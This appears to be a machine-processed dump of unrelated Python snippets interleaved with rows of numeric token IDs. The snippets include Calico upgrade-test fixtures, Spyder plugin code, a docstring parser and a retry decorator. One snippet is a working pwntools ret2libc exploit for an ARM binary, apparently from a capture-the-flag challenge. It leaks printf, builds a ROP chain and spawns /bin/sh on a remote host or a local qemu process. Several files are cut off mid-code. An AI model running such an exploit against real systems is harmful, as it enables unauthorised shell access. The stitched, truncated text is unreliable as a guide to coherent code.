'calico/k8s_ns': 'default',
'type': 'type-endFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Her.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75'},
'spec': {'expectedIPs': ['fd00:1::321'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_name_too_long'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {
'calico/k8s_ns': 'default',
'type': 'type-endFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75'},
'spec': {'expectedIPs': ['fd00:1::321'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_mixed_ip'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {'type': 'production'},
'name': 'eth0',
'node': 'myotherhost'},
'spec': {'expectedIPs': ['192.168.0.1',
'192.168.0.2',
'fd00:ca:fe:1d:52:bb:e9:80'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['ippool_v4_small'] = {
'apiVersion': 'v1',
'kind': 'ipPool',
'metadata': {'cidr': '10.1.0.0/26'},
'spec': {'disabled': False,
'ipip': {'enabled': True, 'mode': 'cross-subnet'},
'nat-outgoing': True}
}
data['ippool_v4_large'] = {
'apiVersion': 'v1',
'kind': 'ipPool',
'metadata': {'cidr': '10.0.0.0/8'},
'spec': {'disabled': False,
'ipip': {'enabled': True, 'mode': 'always'},
'nat-outgoing': True}
}
data['ippool_mixed'] = {
'apiVersion': 'v1',
'kind': 'ipPool',
'metadata': {'cidr': '2006::/64'},
'spec': {'disabled': False,
'ipip': {'enabled': False, 'mode': 'always'},
'nat-outgoing': False}
}
data['node_long_name'] = {
'apiVersion': 'v1',
'kind': 'node',
'metadata': {
'name': '-Mary_had-A-Little___Lamb--Whose---Fleece-Was-White.As.Snow...She-Also-Had_an-Evil-NodeName_in_order_to.break.upgrade-code201600'},
'spec': {'bgp': {'asNumber': '7.20',
'ipv4Address': '10.244.0.1/24',
'ipv6Address': '2001:db8:85a3::8a2e:370:7334/120'}}
}
data['node_tame'] = {
'apiVersion': 'v1',
'kind': 'node',
'metadata': {'name': 'node-hostname'},
'spec': {'bgp': {'asNumber': 64512,
'ipv4Address': '10.244.0.1/24',
'ipv6Address': '2001:db8:85a3::8a2e:370:7334/120'}}
}
data['policy_tame'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'name': 'allow-tcp-6379'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'allow',
'destination': {'ports': [6379]},
'protocol': 'tcp',
'source': {'selector': "role == 'frontend'"}}],
'selector': "role == 'database'",
'types': ['ingress', 'egress']}
}
data['policy_long_name'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {
'name': '-Mary_had-A-Little___Lamb--Whose---Fleece-Was-White.As.Snow...She-Also-Had_an-Evil-PolicyName_in_order_to.break.upgrade-code2016'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'allow',
'destination': {'ports': [6379]},
'protocol': 'tcp',
'source': {'nets': ['192.168.0.1/32']}}],
'selector': "role == 'database'",
'types': ['ingress', 'egress']}
}
data['profile_tame'] = {
'apiVersion': 'v1',
'kind': 'profile',
'metadata': {'labels': {'profile': 'profile1'}, 'name': 'profile1'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'deny',
'source': {'nets': ['10.0.20.0/24']}},
{'action': 'allow',
'source': {'selector': "profile == 'profile1'"}}]}
}
data['profile_long_labels'] = {
'apiVersion': 'v1',
'kind': 'profile',
'metadata': {'labels': {
'8roper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/Key_Name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/Key_name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/key_Name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/9': 'frontendFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '-Mary_had-A-Little___Lamb--Whose---Fleece-Was-White.As.Snow...She-Also-Had_an-Evil-ProfileName_in_order_to.break.upgradeprofile1'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'deny',
'source': {'nets': ['10.0.20.0/24',
'192.168.000.000/32',
'192.168.001.255/32',
'192.168.002.254/32',
'192.168.003.253/32',
'192.168.004.252/32',
'192.168.005.251/32',
'192.168.006.250/32',
'192.168.007.249/32',
'192.168.008.248/32',
'192.168.009.247/32',
'192.168.010.246/32',
'192.168.011.245/32',
'192.168.012.244/32',
'192.168.013.243/32',
'192.168.014.242/32',
'192.168.015.241/32',
'192.168.016.240/32',
'192.168.017.239/32',
'192.168.018.238/32',
'192.168.100.000/32',
'192.168.101.255/32',
'192.168.102.254/32',
'192.168.103.253/32',
'192.168.104.252/32',
'192.168.105.251/32',
'192.168.106.250/32',
'192.168.107.249/32',
'192.168.108.248/32',
'192.168.109.247/32',
'192.168.110.246/32',
'192.168.111.245/32',
'192.168.112.244/32',
'192.168.113.243/32',
'192.168.114.242/32',
'192.168.115.241/32',
'192.168.116.240/32',
'192.168.117.239/32',
'192.168.118.238/32',
'192.168.200.000/32',
'192.168.201.255/32',
'192.168.202.254/32',
'192.168.203.253/32',
'192.168.204.252/32',
'192.168.205.251/32',
'192.168.206.250/32',
'192.168.207.249/32',
'192.168.208.248/32',
'192.168.209.247/32',
'192.168.210.246/32',
'192.168.211.245/32',
'192.168.212.244/32',
'192.168.213.243/32',
'192.168.214.242/32',
'192.168.215.241/32',
'192.168.216.240/32',
'192.168.217.239/32',
'192.168.218.238/32',
'47.0.0.0/8']}},
{'action': 'allow',
'source': {'selector': "profile == 'profile1'"}}]}
}
data['policy_big'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'annotations': {'aname': 'avalue'}, 'name': 'allow-tcp-6379'},
'spec': {'egress': [{'action': 'allow',
'icmp': {'code': 25, 'type': 25},
'protocol': 'icmp'}],
'ingress': [{'action': 'allow',
'destination': {'ports': [6379]},
'notProtocol': 'udplite',
'protocol': 'tcp',
'source': {
'notSelector': "role != 'something' && thing in {'one', 'two'}",
'selector': "role == 'frontend' && thing not in {'three', 'four'}"}},
{'action': 'allow',
'protocol': 'tcp',
'source': {
'notSelector': "role != 'something' && thing in {'one', 'two'}"}},
{'action': 'deny',
'destination': {'notPorts': [80],
'ports': [22, 443]},
'protocol': 'tcp'},
{'action': 'allow',
'source': {'nets': ['172.18.18.200/32',
'172.18.19.0/24']}},
{'action': 'allow',
'source': {'net': '172.18.18.100/32'}},
{'action': 'deny',
'source': {'notNet': '172.19.19.100/32'}},
{'action': 'deny',
'source': {'notNets': ['172.18.0.0/16']}}],
'order': 1234,
'selector': "role == 'database' && !has(demo)",
'types': ['ingress', 'egress']}
}
data['profile_big'] = {
'apiVersion': 'v1',
'kind': 'profile',
'metadata': {'labels': {'profile': 'profile1'},
'name': 'profile1',
'tags': ['atag', 'btag']},
'spec': {'egress': [{'action': 'allow',
'destination': {'notSelector': "profile == 'system'"}},
{'action': 'allow',
'source': {'selector': "something in {'a', 'b'}"}},
{'action': 'allow',
'destination': {'selector': "something not in {'a', 'b'}"}}],
'ingress': [{'action': 'deny',
'destination': {'notPorts': [22, 443, 21, 8080],
'tag': 'atag'},
'protocol': 'udp',
'source': {'net': '172.20.0.0/16',
'notNet': '172.20.5.0/24',
'notTag': 'dtag',
'tag': 'ctag'}},
{'action': 'deny',
'destination': {'notPorts': [22, 443, 21, 8080],
'tag': 'atag'},
'protocol': 'tcp',
'source': {'nets': ['10.0.21.128/25'],
'notNets': ['10.0.20.0/24']}},
{'action': 'deny',
'protocol': 'tcp',
'source': {'notNets': ['10.0.21.128/25']}},
{'action': 'allow',
'protocol': 'tcp',
'source': {'ports': [1234, 4567, 489],
'selector': "profile != 'profile1' && has(role)"}}]}
}
data['wep_lots_ips'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {'app': 'frontend', 'calico/k8s_ns': 'default'},
'name': 'eth0',
'node': 'rack1-host1',
'orchestrator': 'k8s',
'workload': 'default.frontend-5gs43'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['192.168.000.000/32',
'192.168.001.255/32',
'192.168.002.254/32',
'192.168.003.253/32',
'192.168.004.252/32',
'192.168.005.251/32',
'192.168.006.250/32',
'192.168.007.249/32',
'192.168.008.248/32',
'192.168.009.247/32',
'192.168.010.246/32',
'192.168.011.245/32',
'192.168.012.244/32',
'192.168.013.243/32',
'192.168.014.242/32',
'192.168.015.241/32',
'192.168.016.240/32',
'192.168.017.239/32',
'192.168.018.238/32',
'192.168.100.000/32',
'192.168.101.255/32',
'192.168.102.254/32',
'192.168.103.253/32',
'192.168.104.252/32',
'192.168.105.251/32',
'192.168.106.250/32',
'192.168.107.249/32',
'192.168.108.248/32',
'192.168.109.247/32',
'192.168.110.246/32',
'192.168.111.245/32',
'192.168.112.244/32',
'192.168.113.243/32',
'192.168.114.242/32',
'192.168.115.241/32',
'192.168.116.240/32',
'192.168.117.239/32',
'192.168.118.238/32',
'192.168.200.000/32',
'192.168.201.255/32',
'192.168.202.254/32',
'192.168.203.253/32',
'192.168.204.252/32',
'192.168.205.251/32',
'192.168.206.250/32',
'192.168.207.249/32',
'192.168.208.248/32',
'192.168.209.247/32',
'192.168.210.246/32',
'192.168.211.245/32',
'192.168.212.244/32',
'192.168.213.243/32',
'192.168.214.242/32',
'192.168.215.241/32',
'192.168.216.240/32',
'192.168.217.239/32',
'192.168.218.238/32'],
'mac': 'ca:fe:1d:52:bb:e9',
'profiles': ['profile1']}
}
data['wep_similar_name'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {'app': 'frontend', 'calico/k8s_ns': 'default'},
'name': 'eth0',
'node': 'rack1-host1',
'orchestrator': 'k8s',
'workload': 'default/frontend-5gs43'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['192.168.0.0/32',
'192.168.1.255/32',
'192.168.2.254/32',
'192.168.3.253/32',
'192.168.4.252/32',
'192.168.5.251/32',
'192.168.6.250/32',
'192.168.7.249/32',
'192.168.8.248/32',
'192.168.9.247/32',
'192.168.10.246/32',
'192.168.11.245/32',
'192.168.12.244/32',
'192.168.13.243/32',
'192.168.14.242/32',
'192.168.15.241/32',
'192.168.16.240/32',
'192.168.17.239/32',
'192.168.18.238/32'],
'mac': 'fe:ed:ca:fe:00:00',
'profiles': ['profile1']}
}
data['wep_bad_workload_id'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {
'calico/k8s_ns': 'default'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75',
'orchestrator': 'k8s',
'workload': 'default.-_.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My_AlsoAVeryLongWorkload-NameTryingToCatchOutUpgradeCode5'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['192.168.255.255/32', 'fd::1:40'],
'mac': 'ca:fe:1d:52:bb:e9',
'profiles': ['profile1']}
}
data['wep_similar_name_2'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {'app': 'frontend', 'calico/k8s_ns': 'default'},
'name': 'eth0',
'node': 'rack1-host1',
'orchestrator': 'k8s',
'workload': 'default.frontend.5gs43'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['fd00:ca:fe:1d:52:bb:e9:80'],
'mac': 'ca:fe:1d:52:bb:e9',
'profiles': ['profile1']}
}
data['do_not_track'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'name': 'allow-tcp-555-donottrack'},
'spec': {'doNotTrack': True,
'ingress': [{'action': 'allow',
'destination': {'ports': [555]},
'protocol': 'tcp',
'source': {'selector': "role == 'cache'"}}],
'order': 1230,
'selector': "role == 'database'",
'types': ['ingress']}
}
data['prednat_policy'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'name': 'allow-cluster-internal-ingress'},
'spec': {'ingress': [{'action': 'allow',
'source': {'nets': ['10.240.0.0/16',
'192.168.0.0/16']}}],
'order': 10,
'preDNAT': True,
'selector': 'has(host-endpoint)'}
}
| [
2,
15069,
357,
66,
8,
2177,
17030,
64,
11,
3457,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
1... | 1.601773 | 15,225 |
from django.shortcuts import render
from django.template import RequestContext
from ..conf import settings
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
198,
6738,
42625,
14208,
13,
28243,
1330,
19390,
21947,
198,
198,
6738,
11485,
10414,
1330,
6460,
628,
628
] | 4.269231 | 26 |
#This NMT Decoder will return two things: (1) The second decoder hidden state (2) The first decoder hidden state
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import math
import random
import numpy as np
#Implement of cGRU from nematus language toolkit paper address is: | [
2,
1212,
399,
13752,
34580,
481,
1441,
734,
1243,
25,
357,
16,
8,
383,
1218,
875,
12342,
7104,
1181,
357,
17,
8,
383,
717,
875,
12342,
7104,
1181,
198,
198,
11748,
28034,
198,
6738,
28034,
13,
2306,
519,
6335,
1330,
35748,
198,
1174... | 3.666667 | 90 |
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Base plugin class
"""
# Third party imports
import qdarkstyle
from qtpy.QtCore import Qt, Slot
from qtpy.QtGui import QKeySequence
from qtpy.QtWidgets import QDockWidget, QMainWindow, QShortcut
# Local imports
from spyder.config.base import _
from spyder.config.gui import is_dark_interface, get_font
from spyder.config.main import CONF
from spyder.py3compat import is_text_string
from spyder.utils import icon_manager as ima
from spyder.utils.qthelpers import create_action
from spyder.widgets.dock import SpyderDockWidget
class PluginWindow(QMainWindow):
"""MainWindow subclass that contains a Spyder Plugin."""
def closeEvent(self, event):
"""Reimplement Qt method."""
self.plugin.dockwidget.setWidget(self.plugin)
self.plugin.dockwidget.setVisible(True)
self.plugin.switch_to_plugin()
QMainWindow.closeEvent(self, event)
self.plugin.undocked_window = None
class BasePluginMixin(object):
"""Basic functionality for Spyder plugin widgets."""
ALLOWED_AREAS = Qt.AllDockWidgetAreas
LOCATION = Qt.LeftDockWidgetArea
FEATURES = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetMovable
def initialize_plugin_in_mainwindow_layout(self):
"""
If this is the first time the plugin is shown, perform actions to
initialize plugin position in Spyder's window layout.
Use on_first_registration to define the actions to be run
by your plugin
"""
if self.get_option('first_time', True):
try:
self.on_first_registration()
except NotImplementedError:
return
self.set_option('first_time', False)
def update_margins(self):
"""Update plugin margins"""
layout = self.layout()
if self.default_margins is None:
self.default_margins = layout.getContentsMargins()
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
layout.setContentsMargins(*[margin]*4)
else:
layout.setContentsMargins(*self.default_margins)
def update_plugin_title(self):
"""Update plugin title, i.e. dockwidget or window title"""
if self.dockwidget is not None:
win = self.dockwidget
elif self.undocked_window is not None:
win = self.undocked_window
else:
return
win.setWindowTitle(self.get_plugin_title())
def create_dockwidget(self):
"""Add to parent QMainWindow as a dock widget"""
# Creating dock widget
dock = SpyderDockWidget(self.get_plugin_title(), self.main)
# Set properties
dock.setObjectName(self.__class__.__name__+"_dw")
dock.setAllowedAreas(self.ALLOWED_AREAS)
dock.setFeatures(self.FEATURES)
dock.setWidget(self)
self.update_margins()
dock.visibilityChanged.connect(self.visibility_changed)
dock.topLevelChanged.connect(self.on_top_level_changed)
dock.sig_plugin_closed.connect(self.plugin_closed)
self.dockwidget = dock
if self.shortcut is not None:
sc = QShortcut(QKeySequence(self.shortcut), self.main,
self.switch_to_plugin)
self.register_shortcut(sc, "_", "Switch to %s" % self.CONF_SECTION)
return (dock, self.LOCATION)
def create_configwidget(self, parent):
"""Create configuration dialog box page widget"""
if self.CONFIGWIDGET_CLASS is not None:
configwidget = self.CONFIGWIDGET_CLASS(self, parent)
configwidget.initialize()
return configwidget
def switch_to_plugin(self):
"""Switch to plugin."""
if (self.main.last_plugin is not None and
self.main.last_plugin.ismaximized and
self.main.last_plugin is not self):
self.main.maximize_dockwidget()
if not self.toggle_view_action.isChecked():
self.toggle_view_action.setChecked(True)
self.visibility_changed(True)
@Slot()
def plugin_closed(self):
"""DockWidget was closed"""
self.toggle_view_action.setChecked(False)
def get_plugin_font(self, rich_text=False):
"""
Return plugin font option.
All plugins in Spyder use a global font. This is a convenience method
in case some plugins will have a delta size based on the default size.
"""
if rich_text:
option = 'rich_font'
font_size_delta = self.RICH_FONT_SIZE_DELTA
else:
option = 'font'
font_size_delta = self.FONT_SIZE_DELTA
return get_font(option=option, font_size_delta=font_size_delta)
def set_plugin_font(self):
"""
Set plugin font option.
Note: All plugins in Spyder use a global font. To define a different
size, the plugin must define a 'FONT_SIZE_DELTA' class variable.
"""
raise Exception("Plugins font is based on the general settings, "
"and cannot be set directly on the plugin."
"This method is deprecated.")
def show_message(self, message, timeout=0):
"""Show message in main window's status bar"""
self.main.statusBar().showMessage(message, timeout)
def create_toggle_view_action(self):
"""Associate a toggle view action with each plugin"""
title = self.get_plugin_title()
if self.CONF_SECTION == 'editor':
title = _('Editor')
if self.shortcut is not None:
action = create_action(self, title,
toggled=lambda checked: self.toggle_view(checked),
shortcut=QKeySequence(self.shortcut),
context=Qt.WidgetShortcut)
else:
action = create_action(self, title, toggled=lambda checked:
self.toggle_view(checked))
self.toggle_view_action = action
def toggle_view(self, checked):
"""Toggle view"""
if not self.dockwidget:
return
if checked:
self.dockwidget.show()
self.dockwidget.raise_()
else:
self.dockwidget.hide()
@Slot()
def close_window(self):
"""Close QMainWindow instance that contains this plugin."""
if self.undocked_window is not None:
self.undocked_window.close()
self.undocked_window = None
# Oddly, these actions can appear disabled after the Dock
# action is pressed
self.undock_action.setDisabled(False)
self.close_plugin_action.setDisabled(False)
@Slot()
def create_window(self):
"""Create a QMainWindow instance containing this plugin."""
self.undocked_window = window = PluginWindow(self)
window.setAttribute(Qt.WA_DeleteOnClose)
icon = self.get_plugin_icon()
if is_text_string(icon):
icon = self.get_icon(icon)
window.setWindowIcon(icon)
window.setWindowTitle(self.get_plugin_title())
window.setCentralWidget(self)
window.resize(self.size())
self.refresh_plugin()
self.dockwidget.setFloating(False)
self.dockwidget.setVisible(False)
window.show()
@Slot(bool)
def on_top_level_changed(self, top_level):
"""Actions to perform when a plugin is undocked to be moved."""
if top_level:
self.undock_action.setDisabled(True)
else:
self.undock_action.setDisabled(False)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
15069,
10673,
23688,
1082,
4935,
25767,
669,
198,
2,
49962,
739,
262,
2846,
286,
262,
17168,
13789,
198,
2,
357,
3826,
13997,
1082,
14,
834,
15003,
834,
13,... | 2.300294 | 3,400 |
from selenium import webdriver # necessary for web dynamic pages
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
from app.bet_models.betting_data import BettingData
| [
6738,
384,
11925,
1505,
1330,
3992,
26230,
220,
1303,
3306,
329,
3992,
8925,
5468,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11321,
13,
1525,
1330,
2750,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11284,
1330,
2938,
62,... | 3.594937 | 79 |
from deap import benchmarks
from math import sin
| [
6738,
390,
499,
1330,
31747,
198,
6738,
10688,
1330,
7813,
628,
198
] | 4.25 | 12 |
import numpy as np
from autoarray.structures.arrays.two_d import array_2d
from autoarray.structures.grids.two_d import grid_2d
from autoarray.structures.grids.two_d import grid_2d_irregular
from skimage import measure
from functools import wraps
| [
11748,
299,
32152,
355,
45941,
201,
198,
6738,
8295,
18747,
13,
7249,
942,
13,
3258,
592,
13,
11545,
62,
67,
1330,
7177,
62,
17,
67,
201,
198,
6738,
8295,
18747,
13,
7249,
942,
13,
2164,
2340,
13,
11545,
62,
67,
1330,
10706,
62,
1... | 2.835165 | 91 |
import vacefron, randfacts, asyncpraw, datetime, json, requests
import disnake
from jokeapi import Jokes
from .utils import thecolor
from core.utils.HIDDEN import *
reddit = asyncpraw.Reddit(
client_id=client_id,
client_secret=client_secret,
username=username,
password=password,
user_agent=user_agent,
)
vace_api = vacefron.Client()
| [
11748,
410,
558,
69,
1313,
11,
43720,
37473,
11,
355,
2047,
13155,
1831,
11,
4818,
8079,
11,
33918,
11,
7007,
201,
198,
11748,
595,
77,
539,
201,
198,
6738,
9707,
15042,
1330,
449,
3369,
201,
198,
201,
198,
6738,
764,
26791,
1330,
2... | 2.477124 | 153 |
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./arm')
if args.REMOTE:
p = remote('172.104.14.64', 54732)
libc = ELF('./libc-2.23.so')
p.recvuntil('printf at ')
else:
if os.uname().machine == context.arch:
p = process(binary.path)
libc = binary.libc
else:
if args.GDB:
p = process(('stdbuf -i0 -o0 -e0 qemu-'+context.arch+' -g 9000 -L /usr/'+context.arch+'-linux-gnu '+binary.path).split())
else:
p = process(('stdbuf -i0 -o0 -e0 qemu-'+context.arch+' -L /usr/'+context.arch+'-linux-gnu '+binary.path).split())
libc = ELF('/usr/'+context.arch+'-linux-gnu/lib/libc.so.6')
p.recvuntil('print at ')
_ = p.recvline().strip().decode()
printf = int(_,16)
libc.address = printf - libc.sym.printf
log.info('libc.address: ' + hex(libc.address))
payload = b''
payload += 128 * b'A'
payload += 8 * b'B'
payload += p64(libc.search(asm('ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;')).__next__())
payload += (8 * 3) * b'C'
payload += p64(libc.search(asm('mov x0, x19; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;')).__next__())
payload += p64(libc.search(b"/bin/sh").__next__())
payload += (8 * 2) * b'D'
payload += p64(libc.sym.system)
p.sendlineafter('> ',payload)
for i in range(3): p.recvline()
p.interactive()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
6738,
279,
675,
1330,
1635,
198,
198,
39491,
796,
4732,
13,
39491,
796,
17852,
37,
7,
4458,
14,
1670,
11537,
198,
198,
361,
26498,
13,
40726,
23051,
25,
198,
197,
79,
796,
... | 2.14958 | 595 |
# -* coding: utf-8 *-
"""
:py:mod:`pynspector.doc_parser`
-------------------------------
Here you will find parsers for docstrings, this will help you to retrieve all
arguments, types and descriptions defined on docstrings.
You can use different parsers such as:
- sphinx_doc_parser
"""
# System imports
import re
import sys
# Third-party imports
# Local imports
__all__ = ['sphinx_doc_parser']
PARAM_OR_RETURNS_REGEX = re.compile(r":(?:param|returns|return)")
RETURNS_REGEX = re.compile(
r":(returns|return): (?P<doc>.*)(?:(?=:param)|(?=:raises)|(?=:rtype)|(?=:type)|\Z)", re.S
)
TYPE_REGEX = re.compile(
r":type (?P<name>[\*\w]+): (?P<type>.*?)(?:(?=:param)|"
r"(?=:return)|(?=:returns)|(?=:raises)|(?=:rtype)|\Z)", re.S
)
PARAM_REGEX = re.compile(
r":param (?P<type>.*?)(?P<name>[\*\w]+): (?P<doc>.*?)(?:(?=:param)|"
r"(?=:return)|(?=:returns)|(?=:raises)|(?=:rtype)|(?=:type)|\Z)", re.S
)
def _trim(docstring):
"""trim function from PEP-257
:param str docstring: Docstring in string format
:return: Docstring parsed with trim.
:rtype: str
"""
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Current code/unittests expects a line return at
# end of multiline docstrings
# workaround expected behavior from unittests
if "\n" in docstring:
trimmed.append("")
# Return a single string:
return "\n".join(trimmed)
def _reindent(string):
"""Reindent string"""
return "\n".join(l.strip() for l in string.strip().split("\n"))
def sphinx_doc_parser(docstring):
    """Split a Sphinx-style docstring into its components.

    Understands the default Sphinx field format::

        Title of the docstring
        Long description goes here, with
        multiline support.
        :param str argument_one: Argument one description
        :param argument_two: Argument two description
        :type argument_two: str
        :return: What the function returns

    - The short description (title) is mandatory (at least for now).
    - The long description is optional; "" is reported when absent.
    - The param type is optional; None is reported when absent.
    - Both ":return:" and ":returns:" are accepted.

    :param str docstring: Docstring in string format
    :returns: Tuple of (short_description, long_description, params, returns)
    :rtype: tuple
    """
    short_description = ""
    long_description = ""
    returns = ""
    params = {}
    if not docstring:
        return short_description, long_description, params, returns
    docstring = _trim(docstring)
    # First line is the title; everything after the first newline is the body.
    head, newline, tail = docstring.partition("\n")
    short_description = head
    if newline:
        long_description = tail.strip()
        field_block = None
        # Split the body at the first field marker (:param/:returns/:return).
        field_match = PARAM_OR_RETURNS_REGEX.search(long_description)
        if field_match:
            cut = field_match.start()
            field_block = long_description[cut:].strip()
            long_description = long_description[:cut].rstrip()
        if field_block:
            params = {}
            for type_, name, doc in PARAM_REGEX.findall(field_block):
                # Collapse the (possibly multiline) doc onto one line.
                params[name] = {'doc': ' '.join(_trim(doc).split('\n')),
                                'type': type_.strip() if type_ else None}
            returns_match = RETURNS_REGEX.search(field_block)
            if returns_match:
                returns = _reindent(returns_match.group("doc"))
            # ":type name:" fields override (or create) the param type.
            for name, type_ in TYPE_REGEX.findall(field_block):
                type_ = type_.strip()
                if name in params:
                    params[name]['type'] = type_
                else:
                    params[name] = {'doc': '', 'type': type_}
    return short_description, long_description, params, returns
| [
2,
532,
9,
19617,
25,
3384,
69,
12,
23,
1635,
12,
198,
37811,
198,
25,
9078,
25,
4666,
25,
63,
79,
2047,
4443,
273,
13,
15390,
62,
48610,
63,
198,
1783,
24305,
198,
4342,
345,
481,
1064,
13544,
364,
329,
2205,
37336,
11,
428,
48... | 2.409278 | 1,940 |
import pymongo.errors
# Retry decorator with exponential backoff
def retry(tries=5, delay=0.1, backoff=2):
    """Decorator factory: retries a function or method until it returns True.

    :param tries: maximum number of attempts; floored to an int, must be >= 0.
    :param delay: initial pause between attempts in seconds, must be > 0.
    :param backoff: factor by which the pause lengthens after each failure,
        must be > 1 (otherwise it isn't really a backoff).
    :return: a decorator; the wrapped callable returns True as soon as the
        target returns a truthy value, or False once all tries are exhausted.
    :raises ValueError: if tries, delay or backoff is out of range.

    Reference:
    http://wiki.python.org/moin/PythonDecoratorLibrary#Retry"""
    # Local imports keep this block self-contained; the surrounding chunk
    # did not import math (or time/functools) at module level.
    import functools
    import math
    import time

    if backoff <= 1:
        raise ValueError("backoff must be greater than 1")
    tries = math.floor(tries)
    if tries < 0:
        raise ValueError("tries must be 0 or greater")
    if delay <= 0:
        raise ValueError("delay must be greater than 0")

    def deco_retry(f):
        # BUG FIX: the original returned `deco_retry` without ever defining
        # it (NameError at call time); restored from the referenced recipe.
        @functools.wraps(f)
        def f_retry(*args, **kwargs):
            mtries, mdelay = tries, delay
            while mtries > 0:
                if f(*args, **kwargs):
                    return True  # success: stop retrying
                mtries -= 1
                time.sleep(mdelay)
                mdelay *= backoff  # exponential backoff
            return False
        return f_retry

    return deco_retry  # @retry(arg[, ...]) -> true decorator
| [
11748,
279,
4948,
25162,
13,
48277,
198,
198,
2,
4990,
563,
11705,
1352,
351,
39682,
736,
2364,
198,
4299,
1005,
563,
7,
83,
1678,
28,
20,
11,
5711,
28,
15,
13,
16,
11,
736,
2364,
28,
17,
2599,
198,
220,
220,
220,
37227,
9781,
1... | 2.905923 | 287 |
from lib.Message import Message
from lib.User import User
| [
6738,
9195,
13,
12837,
1330,
16000,
198,
6738,
9195,
13,
12982,
1330,
11787,
628
] | 4.214286 | 14 |
from crafting.photography_enums import PhotoStyleType
from interactions import ParticipantTypeSingle, ParticipantType
from interactions.utils.interaction_elements import XevtTriggeredElement
from sims4.tuning.tunable import TunableEnumEntry
import sims4
logger = sims4.log.Logger('Photography', default_owner='rrodgers')
| [
6738,
21671,
13,
38611,
4867,
62,
268,
5700,
1330,
5555,
21466,
6030,
198,
6738,
12213,
1330,
29880,
6030,
28008,
11,
29880,
6030,
198,
6738,
12213,
13,
26791,
13,
3849,
2673,
62,
68,
3639,
1330,
